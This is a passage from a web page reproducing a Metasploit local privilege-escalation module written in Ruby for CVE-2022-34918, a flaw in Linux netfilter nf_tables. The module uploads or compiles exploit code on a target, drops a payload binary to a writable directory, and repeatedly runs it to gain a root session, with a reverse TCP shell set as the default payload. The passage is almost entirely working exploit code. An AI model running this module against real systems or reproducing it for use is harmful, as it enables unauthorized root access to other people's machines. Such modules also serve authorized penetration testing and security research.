privileges.<br /> The attacker can obtain root access, but must start with an unprivileged<br /> user namespace to obtain CAP_NET_ADMIN access.<br /> The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC<br /> 'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates<br /> ],<br /> 'DisclosureDate' => '2022-02-07',<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'SessionTypes' => %w[meterpreter shell],<br /> 'DefaultOptions' => {<br /> 'Payload' => 'linux/x64/shell_reverse_tcp',<br /> 'PrependSetresuid' => true,<br /> 'PrependSetresgid' => true,<br /> 'PrependFork' => true,<br /> 'WfsDelay' => 30<br /> },<br /> 'Targets' => [['Auto', {}]],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes.<br /> 'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted.<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> },<br /> 'References' => [<br /> ['CVE', '2022-34918'],<br /> ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'],<br /> ['URL', 'https://ubuntu.com/security/CVE-2022-34918'],<br /> ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'],<br /> ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC']<br /> ]<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),<br /> OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5])<br /> ]<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp'])<br /> ]<br /> )<br /> end<br /><br /> def base_dir<br /> datastore['WritableDir']<br /> end<br /><br /> def upload_exploit_binary<br /> @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))<br /> upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf'))<br /> register_file_for_cleanup(@executable_path)<br /> end<br /><br /> def upload_payload_binary<br /> @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))<br /> upload_and_chmodx(@payload_path, generate_payload_exe)<br /> register_file_for_cleanup(@payload_path)<br /> end<br /><br /> def upload_source<br /> @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))<br /> mkdir(@exploit_source_path)<br /> register_dir_for_cleanup(@exploit_source_path)<br /> dirs = [ '.' ]<br /> until dirs.empty?<br /> current_dir = dirs.pop<br /> dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir)<br /> Dir.entries(dir_full_path).each do |ent|<br /> next if ent == '.' || ent == '..'<br /><br /> full_path_host = ::File.join(dir_full_path, ent)<br /> relative_path = ::File.join(current_dir, ent)<br /> full_path_target = ::File.join(@exploit_source_path, current_dir, ent)<br /> if File.file?(full_path_host)<br /> vprint_status("Uploading #{relative_path} to #{full_path_target}")<br /> upload_file(full_path_target, full_path_host)<br /> elsif File.directory?(full_path_host)<br /> vprint_status("Creating the directory #{full_path_target}")<br /> mkdir(full_path_target)<br /> dirs.push(relative_path)<br /> else<br /> print_error("#{full_path_host} doesn't look like a file or a directory")<br /> end<br /> end<br /> end<br /> end<br /><br /> def compile_source<br /> fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make')<br /> info = cmd_exec("make -C #{@exploit_source_path}")<br /> vprint_status(info)<br /> @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf')<br /> if exists?(@executable_path)<br /> chmod(@executable_path, 0o700) unless executable?(@executable_path)<br /> print_good('Compilation was successful')<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)')<br /> end<br /> end<br /><br /> def run_payload<br /> success = false<br /> 1.upto(datastore['MAX_TRIES']) do |i|<br /> vprint_status "Execution attempt ##{i}"<br /> info = cmd_exec(@executable_path, @payload_path)<br /> info.each_line do |line|<br /> vprint_status(line.chomp)<br /> end<br /> if session_created?<br /> success = true<br /> break<br /> end<br /> sleep 3<br /> end<br /> if success<br /> print_good('A session has been created')<br /> else<br /> print_bad('Exploit has failed')<br /> end<br /> end<br /><br /> def get_external_source_code(cve, file)<br /> file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}")<br /> ::File.binread(file_path)<br /> end<br /><br /> def module_check<br /> release = kernel_release<br /> version = "#{release} #{kernel_version.split(' ').first}"<br /> ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first<br /> ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten<br /> if ubuntu_kernels.empty?<br /> fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.')<br /> end<br /> fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version)<br /><br /> fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir)<br /> fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp')<br /><br /> if is_root?<br /> fail_with(Failure::BadConfig, 'Session already has root privileges.')<br /> end<br /> end<br /><br /> def check<br /> config = kernel_config<br /><br /> return CheckCode::Unknown('Could not retrieve kernel config') if config.nil?<br /><br /> return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y')<br /><br /> return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled?<br /><br /> return CheckCode::Safe('LKRG is installed') if lkrg_installed?<br /><br /> arch = kernel_hardware<br /><br /> return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64')<br /><br /> release = kernel_release<br /><br /> version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures<br /> if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i)<br /> return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version")<br /> end<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> module_check unless datastore['ForceExploit']<br /><br /> if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make'))<br /> print_status('Uploading the exploit source code')<br /> upload_source<br /> print_status('Compiling the exploit source code')<br /> compile_source<br /> else<br /> print_status('Dropping pre-compiled binaries to system...')<br /> upload_exploit_binary<br /> end<br /> print_status('Uploading payload...')<br /> upload_payload_binary<br /> print_status('Running payload on remote system...')<br /> run_payload<br /> end<br />end<br /></code></pre>